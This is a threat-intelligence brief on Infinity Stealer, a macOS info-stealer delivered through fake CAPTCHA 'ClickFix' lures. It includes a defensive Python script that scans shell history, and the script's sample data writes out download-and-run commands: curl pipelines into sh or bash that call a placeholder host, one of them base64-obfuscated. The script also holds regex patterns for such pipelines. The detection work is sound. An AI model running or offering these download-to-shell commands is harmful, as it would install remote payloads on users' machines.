🔓 BREACH BRIEF · 🟠 High · 🔍 ThreatIntel

Infinity Stealer Malware Harvests macOS Credentials via ClickFix Fake CAPTCHA

Infinity Stealer is a macOS‑only info‑stealer that tricks users with a fake Cloudflare CAPTCHA, then downloads a native binary compiled with Nuitka to steal browser passwords, Keychain entries, crypto wallets and developer secrets. The campaign demonstrates advanced evasion and poses a high‑risk third‑party threat to organizations with macOS endpoints.

🛡️ LiveThreat™ Intelligence · 📅 March 28, 2026 · 📰 bleepingcomputer.com
  • 🟠 Severity: High
  • 🔍 Type: ThreatIntel
  • 🎯 Confidence: High
  • 🏢 Affected: 5 sector(s)
  • Actions: 4 recommended
  • 📰 Source: bleepingcomputer.com


What Happened — A new macOS‑only info‑stealer dubbed Infinity Stealer uses a “ClickFix” lure that mimics Cloudflare’s CAPTCHA. Victims are tricked into pasting a base‑64‑obfuscated curl command into Terminal, which downloads a native macOS binary compiled with Nuitka and proceeds to harvest browser credentials, Keychain entries, crypto wallets and plaintext secrets before exfiltrating them via HTTP POST.

Why It Matters for TPRM

  • macOS endpoints are increasingly common in enterprise environments; a successful compromise can expose privileged credentials and crypto assets.
  • The Nuitka‑compiled payload evades many traditional static‑analysis tools, reducing the effectiveness of existing endpoint detection controls.
  • Credential theft from browsers and Keychain can cascade into supply‑chain risk if compromised accounts have privileged access to third‑party services.

Who Is Affected

  • Organizations that allow macOS laptops or workstations (technology SaaS, professional services, education, media, design, and any firm with a BYOD policy).
  • Vendors that provide macOS‑focused endpoint security or device‑management solutions.

Recommended Actions

  • Review all macOS device policies; enforce strict “no‑paste‑into‑Terminal” rules and user awareness training.
  • Verify that endpoint protection solutions can detect native binaries generated by Nuitka or flag suspicious ClickFix‑style URLs.
  • Harden browser and Keychain access: enable MFA, enforce least‑privilege for stored credentials, and consider credential vaulting.
  • Monitor outbound HTTP traffic for unusual POSTs to unknown C2 domains and for Telegram API calls.

Technical Notes

  • Attack vector: Phishing‑style ClickFix CAPTCHA that delivers a malicious curl command.
  • Payload: Python 3.11 script compiled to a native Mach‑O binary with Nuitka, making static analysis difficult.
  • Data stolen: Chromium‑based and Firefox browser passwords, macOS Keychain entries, cryptocurrency wallet files, .env developer secrets, screenshots.
  • Exfiltration: HTTP POST to attacker‑controlled server; Telegram notification sent on completion.
  • No public CVE associated; the technique is novel for macOS.
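The ClickFix chain described above (a base64-obfuscated curl command pasted into Terminal that fetches a payload and hands it to a shell) leaves a recognisable trace in shell history and command-line telemetry, and the monitoring actions above depend on spotting it. The script below is an added example written for this brief, not code from BleepingComputer or from the malware analysis: it scans command lines for fetch-to-shell and decode-to-shell pipelines, decoding any base64 blob so a download command hidden inside one is still caught. The history lines it scans are constructed, and example.invalid is a placeholder host.

```python
"""Detect ClickFix-style 'paste this into Terminal' commands in shell history.

Added example for this brief (not from the original reporting). It flags
commands that fetch remote content or decode base64 and hand the result
straight to a shell interpreter, including the case where the whole
download command is hidden inside a base64 blob.
"""
import base64
import re
from typing import Dict, List

# A pipe whose consumer is a shell interpreter (optionally via sudo).
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh)\b")
# Network fetch tools commonly used by one-line installers and lures.
FETCH_TOOL = re.compile(r"\b(?:curl|wget)\b")
# base64 invoked in decode mode (-d on Linux/newer macOS, -D on older macOS).
B64_DECODE = re.compile(r"\bbase64\b[^|]*\s-(?:d|D|-decode)\b")
# 'bash -c "$(curl ...)"': command substitution feeding a download to a shell.
CMD_SUBST = re.compile(r"\b(?:sh|bash|zsh)\s+-c\s+[\"']?\$\(\s*(?:curl|wget)\b")
# Runs of base64 alphabet long enough to hide a command.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(line: str) -> List[str]:
    """Return every base64 run in the line that decodes to readable text."""
    decoded: List[str] = []
    for match in B64_BLOB.finditer(line):
        blob = match.group(0)
        blob += "=" * ((-len(blob)) % 4)  # tolerate stripped padding
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            decoded.append(text)
    return decoded


def classify(line: str) -> Dict[str, object]:
    """Classify one command line. The checks run on the raw line and on
    any decoded base64 it contains, so an obfuscated curl pipeline is
    judged by what it decodes to."""
    reasons = set()
    views = [line] + decode_blobs(line)
    for view in views:
        if FETCH_TOOL.search(view) and PIPE_TO_SHELL.search(view):
            reasons.add("download piped to shell")
        if B64_DECODE.search(view) and PIPE_TO_SHELL.search(view):
            reasons.add("base64 decode piped to shell")
        if CMD_SUBST.search(view):
            reasons.add("shell -c with command substitution of a download")
    if any(FETCH_TOOL.search(v) for v in views[1:]):
        reasons.add("base64-encoded download command")
    return {"line": line, "suspicious": bool(reasons), "reasons": sorted(reasons)}


def scan_history(lines: List[str]) -> List[Dict[str, object]]:
    """Classify every line of a shell history (e.g. ~/.zsh_history)."""
    return [classify(line.rstrip("\n")) for line in lines]


# Constructed sample history (not real indicators); example.invalid is a placeholder.
HIDDEN_CMD_B64 = base64.b64encode(b"curl -fsSL https://example.invalid/stage | sh").decode()
HARMLESS_B64 = base64.b64encode(b"hello world from a harmless string").decode()
SAMPLE_HISTORY = [
    "ls -la ~/Projects",
    "git pull origin main",
    f"echo {HIDDEN_CMD_B64} | base64 -d | bash",                # ClickFix-style paste
    "curl -fsSL https://example.invalid/setup.sh | sh",          # direct download-to-shell
    'bash -c "$(curl -fsSL https://example.invalid/stage.sh)"',  # substitution variant
    "base64 -d < archive.b64 > archive.tar.gz",                 # decode to a file: benign
    f"echo {HARMLESS_B64} | base64 -d",                          # decode, no shell: benign
]

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        if finding["suspicious"]:
            print("SUSPICIOUS:", finding["line"])
            for reason in finding["reasons"]:
                print("   -", reason)
```

Pointing `scan_history` at `~/.zsh_history` or `~/.bash_history` on a fleet, or at process command-line events from an EDR, gives a cheap first-pass hunt for the lure; the benign decode-to-file and decode-without-shell lines in the sample show why the detection keys on the pipe into an interpreter rather than on base64 alone.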

Source: BleepingComputer

📰 Original Source
https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/

This LiveThreat Intelligence Brief is an independent analysis. Read the original reporting at the link above.
